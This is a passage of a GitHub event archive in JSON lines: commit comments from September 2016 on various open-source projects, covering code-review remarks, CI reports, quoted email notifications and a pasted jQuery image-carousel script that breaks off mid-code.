{"id":"4554087998","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":18997546,"position":null,"line":null,"path":null,"commit_id":"704cbb79a9acfce97ef75b1ada46f25d38212abf","created_at":"2016-09-13T08:12:28Z","updated_at":"2016-09-13T08:12:28Z","body":"Ok basicaly this is some cosmetic change plus reverting the DB error. So its ok to push."}},"created_at":"2016-09-13T08:12:28Z"}
{"id":"4554088052","type":"CommitCommentEvent","actor":{"login":"kdarbyshirebryant"},"repo":{"name":"lede-project/source"},"payload":{"comment":{"id":18997547,"position":null,"line":null,"path":null,"commit_id":"96f0bbe91d2176284324c4d9b4839b6878148602","created_at":"2016-09-13T08:12:29Z","updated_at":"2016-09-13T08:12:29Z","body":"I'm just grateful that the original versions of these patches didn't make it in...they completely removed version info from the binary, making 'dropbear -V' unhelpful.  This version just tweaks what is announced in the ssh negotiation.  Feel free to submit a patch ;-)"}},"created_at":"2016-09-13T08:12:29Z"}
{"id":"4554089267","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":18997549,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-13T08:12:47Z","updated_at":"2016-09-13T08:12:47Z","body":"The renaming is also important because we have to take into account the fact that \"spidersFoKing\" also contains pieces that allow discovered checks, not only pins.\r\n\r\nWhite : rook g1 + knight g2\r\nBlack: king in g8.\r\n\r\nI find it *really really really* disturbing that the white rook in g1 would be called a \"pinnersForKing[BLACK]\" in the code, because there is absolutely no pinned piece in the position (either potential nor absolute).\r\n\r\n"}},"created_at":"2016-09-13T08:12:47Z"}
{"id":"4554090127","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":18997554,"position":100,"line":100,"path":"ryu/app/simple_switch_rest_13.py","commit_id":"5f521b50d66c5aeba838640bc1372a66013183ba","created_at":"2016-09-13T08:12:59Z","updated_at":"2016-09-13T08:12:59Z","body":"ご指摘の通り、参照先の処理を元に以下の様に修正いたします。\r\n```\r\n        try:\r\n            new_entry = req.json if req.body else {}\r\n        except ValueError:\r\n            raise Response(status=400)\r\n```\r\n\r\nユーザ入力値が異常の場合となるため、ステータスコードは400を返却することで問題はないと思います。"}},"created_at":"2016-09-13T08:12:59Z"}
{"id":"4554090883","type":"CommitCommentEvent","actor":{"login":"k-okada"},"repo":{"name":"jsk-ros-pkg/jsk_recognition"},"payload":{"comment":{"id":18997558,"position":4,"line":69,"path":"jsk_perception/package.xml","commit_id":"025489b586723524cde89b8245c52dd915e193ba","created_at":"2016-09-13T08:13:11Z","updated_at":"2016-09-13T08:13:11Z","body":"pip!!!!"}},"created_at":"2016-09-13T08:13:11Z"}
{"id":"4554090973","type":"CommitCommentEvent","actor":{"login":"ihnorton"},"repo":{"name":"Slicer/Slicer"},"payload":{"comment":{"id":18997559,"position":68,"line":911,"path":"Libs/MRML/Core/vtkMRMLStorageNode.cxx","commit_id":"cfdf8cc590450e5bcbe13b75c9cc6a9b5019883e","created_at":"2016-09-13T08:13:13Z","updated_at":"2016-09-13T08:13:13Z","body":"Adding the wild-card here does not seem correct. Every storage node that defaults to the base implementations now should claim it can read any file?\r\n\r\nFor a concrete example why this is a problem: `vtkMRMLFreeSurferModelStorageNode::SupportedFileType` defers to the base implementation, which sees `.*` in the list and thus returns true for `.vtk` and `.vtp`. This is leading to errors when loading fiberbundleNodes through CLI. (ModelMaker works fine, but maybe that has something to do with storage node priorities?)"}},"created_at":"2016-09-13T08:13:13Z"}
{"id":"4554091763","type":"CommitCommentEvent","actor":{"login":"domenkozar"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18997562,"position":null,"line":null,"path":null,"commit_id":"6ff44c571bb3c9bc810afcb7d7f9ea72c713e37d","created_at":"2016-09-13T08:13:23Z","updated_at":"2016-09-13T08:13:23Z","body":"Don't think it helped: http://hydra.nixos.org/build/40468706/nixlog/2/raw"}},"created_at":"2016-09-13T08:13:23Z"}
{"id":"4554092441","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/mapotempo-web"},"payload":{"comment":{"id":18997564,"position":15,"line":185,"path":"app/assets/javascripts/scaffolds.js","commit_id":"6946fffaf326f0a53c5726cd526d053b6a31d8bd","created_at":"2016-09-13T08:13:33Z","updated_at":"2016-09-13T08:13:33Z","body":"; missing"}},"created_at":"2016-09-13T08:13:33Z"}
{"id":"4554093230","type":"CommitCommentEvent","actor":{"login":"liuqiang666"},"repo":{"name":"liuqiang666/learngit"},"payload":{"comment":{"id":18997566,"position":null,"line":null,"path":null,"commit_id":"98a6ae8b2d4f5fe922d68762b6cf93ae83b7d705","created_at":"2016-09-13T08:13:43Z","updated_at":"2016-09-13T08:13:43Z","body":"d"}},"created_at":"2016-09-13T08:13:43Z"}
{"id":"4554094727","type":"CommitCommentEvent","actor":{"login":"kwonn"},"repo":{"name":"sunset1215/rcs"},"payload":{"comment":{"id":18997570,"position":null,"line":null,"path":null,"commit_id":"9ff9337a7558b00c0c2fea26f3f507b0bb413539","created_at":"2016-09-13T08:14:04Z","updated_at":"2016-09-13T08:14:04Z","body":"I have pulled."}},"created_at":"2016-09-13T08:14:04Z"}
{"id":"4554095770","type":"CommitCommentEvent","actor":{"login":"yglukhov"},"repo":{"name":"nim-lang/Nim"},"payload":{"comment":{"id":18997575,"position":null,"line":null,"path":null,"commit_id":"87eb3a105d4a2b6f9e9fd18bc6cca18d458d1cca","created_at":"2016-09-13T08:14:20Z","updated_at":"2016-09-13T08:14:20Z","body":"The regression is fixed by #4758"}},"created_at":"2016-09-13T08:14:20Z"}
{"id":"4554098017","type":"CommitCommentEvent","actor":{"login":"01micko"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18997578,"position":null,"line":null,"path":null,"commit_id":"cd80fb134b90b0b3833f160cb34cf2b211a94d24","created_at":"2016-09-13T08:14:51Z","updated_at":"2016-09-13T08:14:51Z","body":"Hi Richard\r\n\r\nThe only reason I left off a leading dash is because it is a part of the 'basic' help. That may not be the most logical approach. I don't mind either way, but I would like things to be logical and 'newbie' friendly.\r\n\r\nI haven't committed anything as yet. Feel free to do as you see fit.\r\n\r\nCheers! :smiley: "}},"created_at":"2016-09-13T08:14:51Z"}
{"id":"4554098842","type":"CommitCommentEvent","actor":{"login":"nfeske"},"repo":{"name":"ehmry/genode"},"payload":{"comment":{"id":18997580,"position":24,"line":35,"path":"repos/os/include/input_session/connection.h","commit_id":"136e4193f9b49bc5f141f7791f7ad419d4235f87","created_at":"2016-09-13T08:15:03Z","updated_at":"2016-09-13T08:15:03Z","body":"I would leave this change for another issue and prefer to keep it consistent with the other places at this point. So I'd keep @ehmry's version."}},"created_at":"2016-09-13T08:15:03Z"}
{"id":"4554099116","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":18997582,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-13T08:15:08Z","updated_at":"2016-09-13T08:15:08Z","body":"@snicolet Yes you are right. Did not understand immediately your argument regarding discovered checks but in meantime I have grabbed it ;-)"}},"created_at":"2016-09-13T08:15:08Z"}
{"id":"4554101995","type":"CommitCommentEvent","actor":{"login":"kdarbyshirebryant"},"repo":{"name":"tegularius/sch_cake"},"payload":{"comment":{"id":18997586,"position":null,"line":null,"path":null,"commit_id":"2f3c308faec499069959b4489e5a724a7d3b82f3","created_at":"2016-09-13T08:15:45Z","updated_at":"2016-09-13T08:15:45Z","body":"You obviously know how to code C and your way around linux conntrack which is much more than me!  Thank you.  I shall give it a go :-)"}},"created_at":"2016-09-13T08:15:45Z"}
{"id":"4554103648","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/mapotempo-web"},"payload":{"comment":{"id":18997591,"position":5,"line":102,"path":"app/api/v01/api.rb","commit_id":"04e247aa4082b4eb9b7155d0a2a515ba7acfef9d","created_at":"2016-09-13T08:16:08Z","updated_at":"2016-09-13T08:16:08Z","body":"uniformise les cas d'erreur : 2 x 404 -> 1 x 404"}},"created_at":"2016-09-13T08:16:08Z"}
{"id":"4554103742","type":"CommitCommentEvent","actor":{"login":"jangxyz"},"repo":{"name":"snailzzang/bookocr"},"payload":{"comment":{"id":18997592,"position":null,"line":null,"path":null,"commit_id":"c224983afe049b7ffbe32468bbefee71eba6ed16","created_at":"2016-09-13T08:16:10Z","updated_at":"2016-09-13T08:16:10Z","body":"for #66 "}},"created_at":"2016-09-13T08:16:10Z"}
{"id":"4554106172","type":"CommitCommentEvent","actor":{"login":"laoshuterry"},"repo":{"name":"laoshuterry/pinterofc"},"payload":{"comment":{"id":18997594,"position":null,"line":null,"path":null,"commit_id":"a0b93abbee343f65357090a32eb142dff003e913","created_at":"2016-09-13T08:16:41Z","updated_at":"2016-09-13T08:16:41Z","body":"直接留言就行。不过最好不要在commit信息里留言，这样感觉别扭。你可以直接发我邮件\r\n\r\n在 2016年9月12日 下午8:17，tianqi911 <notifications@github.com>写道：\r\n\r\n> 你好。我刚开始看这本书，中文版，有问题怎么能请教你呢？\r\n> 看了很多C的书，完全不得要领，感觉写实际的单片机程序的时候，还是一团糟，不会用指针。\r\n> 是不是留言就行。\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/laoshuterry/pinterofc/commit/a0b93abbee343f65357090a32eb142dff003e913#commitcomment-18983808>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/ADhXohA833JnIQdjAZxjqw0i_QOtLfoBks5qpUK8gaJpZM4J6hVu>\r\n> .\r\n>\r\n"}},"created_at":"2016-09-13T08:16:41Z"}
{"id":"4554107861","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":18997597,"position":null,"line":null,"path":null,"commit_id":"a880d87464f1c8360be3f3998c7fb4e3fe0b19e8","created_at":"2016-09-13T08:17:07Z","updated_at":"2016-09-13T08:17:07Z","body":"Ok its \"too early\" work to say anithing on this expect yes its a good idea to check ispet before casting.\r\nAbout the https://github.com/cmangos/issues/issues/1075 i dont understaind the issue. Is it ok ro not?\r\nWell i encountered some issue also during that hunter tame quest so i'll take a look on it too. As i always forgot stuff this will need to be reminded to me if no action from me in a reasonable time :)"}},"created_at":"2016-09-13T08:17:07Z"}
{"id":"4554108175","type":"CommitCommentEvent","actor":{"login":"domtronn"},"repo":{"name":"melpa/melpa"},"payload":{"comment":{"id":18997598,"position":5,"line":4,"path":"recipes/all-the-icons","commit_id":"ad9dcd90251abacbba55c52dcb3e879758aaba38","created_at":"2016-09-13T08:17:11Z","updated_at":"2016-09-13T08:17:11Z","body":"Not really... All of the fonts are available on the GitHub page for the package and can be downloaded from there. I guess I just assumed people wouldn't think to look inside the installed package for the fonts? Guess I was wrong 😅 "}},"created_at":"2016-09-13T08:17:11Z"}
{"id":"4554110298","type":"CommitCommentEvent","actor":{"login":"dbuenzli"},"repo":{"name":"ocaml-doc/doc-ock-html"},"payload":{"comment":{"id":18997603,"position":4,"line":7,"path":"src/docOckHtmlDocumentation.mli","commit_id":"64a191c646856cc30cfd33f057a788b33deed481","created_at":"2016-09-13T08:17:42Z","updated_at":"2016-09-13T08:17:42Z","body":"It should not be the first line break but the first blank line. "}},"created_at":"2016-09-13T08:17:42Z"}
{"id":"4554110853","type":"CommitCommentEvent","actor":{"login":"dragon8818"},"repo":{"name":"dragonoob/game-master"},"payload":{"comment":{"id":18997605,"position":null,"line":null,"path":null,"commit_id":"015e69d4cec7a9b5d4faacdc7ddbdafb201d3217","created_at":"2016-09-13T08:17:48Z","updated_at":"2016-09-13T08:17:48Z","body":"- \r\n\r\n- "}},"created_at":"2016-09-13T08:17:48Z"}
{"id":"4554112602","type":"CommitCommentEvent","actor":{"login":"hausl"},"repo":{"name":"php-de/php-de.github.io"},"payload":{"comment":{"id":18997607,"position":null,"line":null,"path":null,"commit_id":"fdb126887deaa71ee5e73a4a12b57a8d035cb688","created_at":"2016-09-13T08:18:11Z","updated_at":"2016-09-13T08:18:11Z","body":"Kannst du die Farbe wieder so anpassen wie sie vorher war, das schaut so sehr hart und zersissen aus.\r\nzB http://php-de.github.io/jumpto/datetime/\r\nDanke!"}},"created_at":"2016-09-13T08:18:11Z"}
{"id":"4554114923","type":"CommitCommentEvent","actor":{"login":"julienmalik"},"repo":{"name":"YunoHost/SSOwat"},"payload":{"comment":{"id":18997613,"position":74,"line":601,"path":"helpers.lua","commit_id":"2f4fcd394a5cd3db27ea6f7776b0481571e0d681","created_at":"2016-09-13T08:18:38Z","updated_at":"2016-09-13T08:18:38Z","body":"even if not perfect, at least I like the fact that we use the exact same code from both side (moulinette & ssowat). also, this is only used when a user changes its password from the sso (isn't it?) so we don't care about performance here."}},"created_at":"2016-09-13T08:18:38Z"}
{"id":"4554115572","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":18997614,"position":null,"line":null,"path":null,"commit_id":"76d4ab33573543d01bde0c19c9735a66acc11baa","created_at":"2016-09-13T08:18:47Z","updated_at":"2016-09-13T08:18:47Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35235/testReport/) for this commit**"}},"created_at":"2016-09-13T08:18:47Z"}
{"id":"4554116304","type":"CommitCommentEvent","actor":{"login":"bangwu93"},"repo":{"name":"sunset1215/rcs"},"payload":{"comment":{"id":18997615,"position":null,"line":null,"path":null,"commit_id":"9ff9337a7558b00c0c2fea26f3f507b0bb413539","created_at":"2016-09-13T08:18:57Z","updated_at":"2016-09-13T08:18:57Z","body":"Dear Vivian,\n\n \n\nI am working on it now, sorry for the delay L\n\n \n\nRegards,\n\nBangwu\n\n \n\nFrom: Low Bao Ling Vivian [mailto:notifications@github.com] \nSent: Tuesday, 13 September 2016 3:54 PM\nTo: sunset1215/rcs <rcs@noreply.github.com>\nCc: bangwu93 <bangwu.hong@hotmail.com>; Mention <mention@noreply.github.com>\nSubject: Re: [sunset1215/rcs] Add B1.txt (9ff9337)\n\n \n\n@kwonn <https://github.com/kwonn>  @bangwu93 <https://github.com/bangwu93>  \nIf you have pulled this, please acknowledge so that we can proceed to the next step. Many thanks.\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub <https://github.com/sunset1215/rcs/commit/9ff9337a7558b00c0c2fea26f3f507b0bb413539#commitcomment-18997380> , or mute the thread <https://github.com/notifications/unsubscribe-auth/AUNh-qFpJFCJzD7F6c_2QLPDazVP3e12ks5qplawgaJpZM4J6CSa> .\n\n"}},"created_at":"2016-09-13T08:18:57Z"}
{"id":"4554116937","type":"CommitCommentEvent","actor":{"login":"kakawka"},"repo":{"name":"beautyfree/dotfiles"},"payload":{"comment":{"id":18997617,"position":null,"line":null,"path":null,"commit_id":"27382d495d10f82a36dd41750c3ccc84151bfcd8","created_at":"2016-09-13T08:19:05Z","updated_at":"2016-09-13T08:19:05Z","body":"@beautyfree алоу?"}},"created_at":"2016-09-13T08:19:05Z"}
{"id":"4554120117","type":"CommitCommentEvent","actor":{"login":"bummzack"},"repo":{"name":"silvershop/silvershop-core"},"payload":{"comment":{"id":18997625,"position":null,"line":null,"path":null,"commit_id":"047bbdc7204556a9aa8f71de0efbc6723d75740f","created_at":"2016-09-13T08:19:46Z","updated_at":"2016-09-13T08:19:46Z","body":"I suggest to undo this change. The config system should *not* be used for translations."}},"created_at":"2016-09-13T08:19:46Z"}
{"id":"4554121012","type":"CommitCommentEvent","actor":{"login":"osfans"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":18997626,"position":null,"line":null,"path":null,"commit_id":"5c5b87c18680b3dd45c9efa1196ea4b4cdefd910","created_at":"2016-09-13T08:19:59Z","updated_at":"2016-09-13T08:19:59Z","body":"@lotem 幫忙審閱。實現內碼和區位輸入。\r\n\r\n```yaml\r\nengine:\r\n  translators:\r\n    - charset_translator@utf\r\nutf:\r\n  tag: utf\r\n  prefix: u\r\n  suffix: \"\"\r\n  tips: 〔內碼〕\r\n  charset: \"\" # [ quwei | utf | xml | utf-8 | gbk | ...]\r\n```"}},"created_at":"2016-09-13T08:19:59Z"}
{"id":"4554121115","type":"CommitCommentEvent","actor":{"login":"julienmalik"},"repo":{"name":"YunoHost/SSOwat"},"payload":{"comment":{"id":18997629,"position":14,"line":51,"path":"helpers.lua","commit_id":"2f4fcd394a5cd3db27ea6f7776b0481571e0d681","created_at":"2016-09-13T08:20:00Z","updated_at":"2016-09-13T08:20:00Z","body":"this function does not seem to respect the coding convention of the rest of the file. If this is copy-pasted from \"the Internet\", please document the source, and double check the license."}},"created_at":"2016-09-13T08:20:00Z"}
{"id":"4554121184","type":"CommitCommentEvent","actor":{"login":"RorschachSzr"},"repo":{"name":"RorschachSzr/TongXinYuan"},"payload":{"comment":{"id":18997630,"position":4,"line":5,"path":"README.md","commit_id":"279d340613a05daf89f78060851076b229235750","created_at":"2016-09-13T08:20:01Z","updated_at":"2016-09-13T08:20:01Z","body":"第二次修改"}},"created_at":"2016-09-13T08:20:01Z"}
{"id":"4554122493","type":"CommitCommentEvent","actor":{"login":"RorschachSzr"},"repo":{"name":"RorschachSzr/TongXinYuan"},"payload":{"comment":{"id":18997638,"position":null,"line":null,"path":null,"commit_id":"279d340613a05daf89f78060851076b229235750","created_at":"2016-09-13T08:20:19Z","updated_at":"2016-09-13T08:20:19Z","body":"2"}},"created_at":"2016-09-13T08:20:19Z"}
{"id":"4554125567","type":"CommitCommentEvent","actor":{"login":"mashers"},"repo":{"name":"mashers/3DSafe"},"payload":{"comment":{"id":18997645,"position":null,"line":null,"path":null,"commit_id":"2ed34dd266a32d06a41f22e15c83ff221ac7ad7f","created_at":"2016-09-13T08:20:54Z","updated_at":"2016-09-13T08:20:54Z","body":"Summary of changes:\r\n* If a valid otp.bin is found it is copied to sysNAND. This means it can be used to run SafeA9LHInstaller without otp.bin on the SD card\r\n* Now attempts to run SafeA9LHInstaller in the unlikely event that access to sysNAND can't be achieved. This should prevent bricks in this situation as users can then put otp.bin on SD card, run SafeA9LHInstaller and install a different A9LH payload\r\n* Attempted to get OTP reading from memory in SafeA9LHInstaller but this has not yet been possible "}},"created_at":"2016-09-13T08:20:54Z"}
{"id":"4554126209","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":18997647,"position":null,"line":null,"path":null,"commit_id":"36b0686d271a29550f703f6d0cff3c1dc856ecdb","created_at":"2016-09-13T08:21:02Z","updated_at":"2016-09-13T08:21:02Z","body":"@datakurre Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.tiles/50/violations\n```\nplone/tiles/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/tiles/data.py:196:1: C901 'map_to_pairs' is too complex (12)\nplone/tiles/data.py:244:1: C901 'encode' is too complex (15)\nplone/tiles/data.py:325:1: C901 'decode' is too complex (13)\nplone/tiles/directives.py:0:1: I001 isort found changes, run it on the file\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-13T08:21:02Z"}
{"id":"4554131954","type":"CommitCommentEvent","actor":{"login":"zhaoxile"},"repo":{"name":"MikuAuahDark/NPPS"},"payload":{"comment":{"id":18997652,"position":null,"line":null,"path":null,"commit_id":"b86dfb7cd10a05c268173183d03916763078924e","created_at":"2016-09-13T08:22:19Z","updated_at":"2016-09-13T08:22:19Z","body":"After designing the private server , a 500 error reported that failed to attach db \"marathon.db_\" ."}},"created_at":"2016-09-13T08:22:19Z"}
{"id":"4554134813","type":"CommitCommentEvent","actor":{"login":"Obihoernchen"},"repo":{"name":"brusselopole/Worldopole"},"payload":{"comment":{"id":18997655,"position":null,"line":null,"path":null,"commit_id":"66fede2b5b75cec699ef54a2f8ce7a06ec7d1697","created_at":"2016-09-13T08:22:53Z","updated_at":"2016-09-13T08:22:53Z","body":"This is bad with the current implementation of data.loader.php see: https://github.com/brusselopole/Worldopole/pull/59#issuecomment-246609514"}},"created_at":"2016-09-13T08:22:53Z"}
{"id":"4554135722","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":18997657,"position":5,"line":30,"path":"src/game/AI/AggressorAI.cpp","commit_id":"5fab5ddc8722dee23a6a7af0726087979d298d1c","created_at":"2016-09-13T08:23:05Z","updated_at":"2016-09-13T08:23:05Z","body":"Ok even if you are correct for me (!cond1 && !cond2) is more readeable than (!(cond1 || cond2))\r\nWell this is purely subjective.\r\nSo no problem to use this however iam not convinced to change this in this commit. It only polute it."}},"created_at":"2016-09-13T08:23:05Z"}
{"id":"4554136032","type":"CommitCommentEvent","actor":{"login":"muyiou"},"repo":{"name":"alibaba/freeline"},"payload":{"comment":{"id":18997659,"position":null,"line":null,"path":null,"commit_id":"42fa5411b0b5e082bebb9d066164f47a6fe0e713","created_at":"2016-09-13T08:23:10Z","updated_at":"2016-09-13T08:23:10Z","body":"bingo"}},"created_at":"2016-09-13T08:23:10Z"}
{"id":"4554138825","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":18997661,"position":66,"line":66,"path":"ryu/app/simple_switch_lacp_13.py","commit_id":"5f521b50d66c5aeba838640bc1372a66013183ba","created_at":"2016-09-13T08:23:47Z","updated_at":"2016-09-13T08:23:47Z","body":"以下の様にsimple_switch_13.SimpleSwitch13を継承し\r\n`switch_features_handler `と` add_flow`を削除しました。\r\n````\r\nimport simple_switch_13\r\n\r\nclass SimpleSwitchLacp13(simple_switch_13.SimpleSwitch13):\r\n````\r\n\r\nRyu-bookの内容に従いアプリケーションを実行したところ、差分なく動作できました。"}},"created_at":"2016-09-13T08:23:47Z"}
{"id":"4554139046","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":18997663,"position":16,"line":47,"path":"src/game/AI/AggressorAI.cpp","commit_id":"5fab5ddc8722dee23a6a7af0726087979d298d1c","created_at":"2016-09-13T08:23:50Z","updated_at":"2016-09-13T08:23:50Z","body":"same remark avoid that kind of change when you do/fix stuff."}},"created_at":"2016-09-13T08:23:50Z"}
{"id":"4554140353","type":"CommitCommentEvent","actor":{"login":"PD1LOI"},"repo":{"name":"E2OpenPlugins/e2openplugin-HetWeer"},"payload":{"comment":{"id":18997668,"position":null,"line":null,"path":null,"commit_id":"7590e289422bed0da19f470d406f57d8d24428fc","created_at":"2016-09-13T08:24:09Z","updated_at":"2016-09-13T08:24:09Z","body":"Op deze manier zou de bouw in plifeed goed moeten zijn. Dit is de juiste volgorde van de mappen en files"}},"created_at":"2016-09-13T08:24:09Z"}
{"id":"4554144141","type":"CommitCommentEvent","actor":{"login":"smart09"},"repo":{"name":"smart09/4G"},"payload":{"comment":{"id":18997675,"position":1,"line":1,"path":"js/js","commit_id":"9ecf9bc6348f56bb20e40953ef0f5d77ebee5571","created_at":"2016-09-13T08:24:59Z","updated_at":"2016-09-13T08:24:59Z","body":"//焦点图轮播\r\nfunction dotClick(ulName,dotName,moveTime){\r\n\tvar myUl=$(ulName)  //将ul里的sum对象赋给myUl变量\r\n\tvar myli=$(ulName).children(\"li:first\");  //将第一个li元素赋给myli变量\r\n\tvar mylis=$(ulName).children(\"li\");\r\n\tvar oldot=$(dotName);\r\n\tvar dotNumbers=1;\r\n\tfor(var i=0;i<mylis.length;i++){\r\n\t\tdotNumbers++;\r\n\t\toldot.append(\"<span></span>\");\r\n\t}\r\n\tvar tbsc=null;\r\n\tvar tips=$(myli).clone(true);\r\n\tmyUl.append(tips);\r\n\tvar mylilast=$(ulName).children(\"li:last\");\r\n\t$(dotName).children(\"span:first\").addClass(\"active\");\r\n\tvar mydotlast=$(dotName).children(\"span:last\");\r\n\tvar num=0;\r\n\tvar num1=0;\r\n\tvar imgwidth=myUl.children(\"li\").css(\"width\");\r\n\timgwidth=parseInt(imgwidth);\r\n\tvar steps=myUl.children(\"li\").length;\r\n\tmyUl.width(imgwidth*steps);\r\n\tfunction sport(){\r\n\t\tnum1++;\r\n\t\tnum++;\r\n\t\tvar distance=imgwidth*-num;\r\n\t\tif(num>myUl.children(\"li:last\").index()){\r\n\t\t\tnum=1;\r\n\t\t\tmyUl.css(\"left\",0).stop().animate({left:(imgwidth*-1)},300);\r\n\t\t}else{\r\n\t\t\tmyUl.stop().animate({left:distance},300);\r\n\t\t};\r\n\t\tif(num1>mydotlast.index()){\r\n\t\t\tnum1=0;\r\n\t\t\toldot.children(\"span\").eq(num1).addClass(\"active\").siblings().removeClass(\"active\");\r\n\t\t}else{\r\n\t\t\toldot.children(\"span\").eq(num1).addClass(\"active\").siblings().removeClass(\"active\");\r\n\t\t}\r\n\t}\r\n\ttbsc=setInterval(sport,moveTime);\r\n\tvar distbts;\r\n\toldot.children(\"span\").click(function(){\r\n\t\tdistbts=imgwidth*$(this).index()*-1;\r\n\t\t$(this).addClass(\"active\").siblings().removeClass(\"active\");\r\n\t\tmyUl.animate({left:distbts},300);\r\n        num=$(this).index();\r\n        num1=$(this).index();\r\n        clearInterval(tbsc);\r\n        tbsc=setInterval(sport,moveTime);\r\n\t})\r\n\tmylis.hover(function(){\r\n\t\tclearInterval(tbsc);\r\n\t},function(){\r\n\t\tsetInterval(sport,moveTime);\r\n\t})\r\n}\r\ndotClick($(\"#sum\"),$(\".dot\"),3000);\r\n\r\n//图片透明度交互\r\n$(\"#w_con li img\").hover(function(){\r\n\t$(this).css({opacity:\"0.6\"});\r\n},function(){\r\n\t$(this).css({opacity:\"1\"});\r\n})\r\n//4G元年大事记\r\n$(function(){\r\n\t$(\".w962 li:first\").find(\".txt_bg\").css({display:\"block\"});\r\n\t$(\".w962 li\").hover(function(){\r\n\t\tvar num3=$(this).i\r\n\t\tndex()\r\n\t\tif(num3==0){\r\n\t\t\t$(\".w962 li:first\").find(\".txt_bg\").css({display:\"block\"});\r\n\t\t    $(this).addClass(\"show\").siblings().removeClass(\"show\");\r\n\t\t}else{\r\n\t\t\t$(\".w962 li:first\").find(\".txt_bg\").css({display:\"none\"});\r\n\t\t\t$(this).addClass(\"show\").siblings().removeClass(\"show\");\r\n\t\t}\r\n\t})\r\n})\r\n\r\n//4G终端盘点交互\r\n$(function(){\r\n\t/*在UI内部结尾处插入一个和第一个一样的li*/\r\n\tfunction rollByEachPic(ulName1,rightBtn,leftBtn,startPicNum,moveTime1){\r\n\t\tvar theUl=$(ulName1);\r\n\t\tvar theRightBtn=$(rightBtn);\r\n\t\tvar theLeftBtn=$(leftBtn);\r\n\t\t//var myli=$(\".sum li\").slice(0,4);  //根据初始页面li的数量取值\r\n\t\tvar myli1=theUl.children(\"li\").slice(0,startPicNum);  //根据初始页面li的数量取值\r\n\t\t//alert(myli.length);\r\n\t\tvar mylis1=theUl.children(\"li\");\r\n\t\tvar tbsc1=null;\r\n\t\tvar tips1=$(myli1).clone(true);\r\n\t\ttheUl.append(tips1);\r\n\t\t/*点击事件*/\r\n\t\tvar num4=0; /*图片的*/\r\n\t\tvar imgwidth1=parseInt(mylis1.css(\"width\"));  //获取插入图片的宽度\r\n\t\tvar imgmr=parseInt(mylis1.css(\"margin-right\"));\r\n\t\tvar moveDistance=imgwidth1+imgmr;\r\n\t\tvar steps1=theUl.children(\"li\").length;/*获取li个数*/\r\n\t\ttheUl.width(moveDistance*steps1)  /*给ul赋值--宽度*/\r\n\t\ttheRightBtn.click(function(){\r\n\t\t\tclearInterval(tbsc1);\r\n\t\t\tnum4++;\r\n\t\t\tvar distance1=moveDistance*-num4;\r\n\t\t\tif(num4>(mylis1.length)){\r\n\t\t\t\tnum4=1;\r\n\t\t\t\ttheUl.css(\"left\",0).stop().animate({left:(moveDistance*-1)},300);\r\n\t\t\t}else{\r\n\t\t\t\ttheUl.stop().animate({left:distance1},300);\r\n\t\t\t};\r\n\t\t\t});\r\n\t\t\ttheLeftBtn.click(function(){\r\n\t\t\t\tclearInterval(tbsc1);\r\n\t\t\t\tnum4--;\r\n\t\t\t\tvar num6=mylis1.length;\r\n\t\t\t\tvar dist1=moveDistance*num4*-1;\r\n\t\t\t\tif(num4<0){\r\n\t\t\t\t\tnum4=num6-1;\r\n\t\t\t\t\ttheUl.css(\"left\",(num6*-1*moveDistance)).stop().animate({left:((num6-1)*-1*moveDistance)},300);\r\n\t\t\t\t}else{\r\n\t\t\t\t\ttheUl.stop().animate({left:dist1},300);\r\n\t\t\t\t}\r\n\t\t\t\ttbsc1=setInterval(sports1,moveTime1);\r\n\t\t\t\t})\r\n\t\t\t\t/*鼠标放上stop,离开回复动*/\r\n\t\t\t\ttheUl.children(\"li\").hover(function(){\r\n\t\t\t\t\tclearInterval(tbsc1);\r\n\t\t\t\t},function(){\r\n\t\t\t\t\ttbsc1=setInterval(sports1,moveTime1);\r\n\t\t\t\t})\r\n\t\t\t\t/*定时器*/\r\n\t\t\t\tfunction sports1(){\r\n\t\t\t\t\tnum4++;\r\n\t\t\t        var distance1=moveDistance*-num4;\r\n\t\t\t        if(num4>(mylis1.length)){\r\n\t\t\t\t      num4=1;\r\n\t\t\t\t      theUl.css(\"left\",0).stop().animate({left:(moveDistance*-1)},300);\r\n\t\t\t        }else{\r\n\t\t\t\t      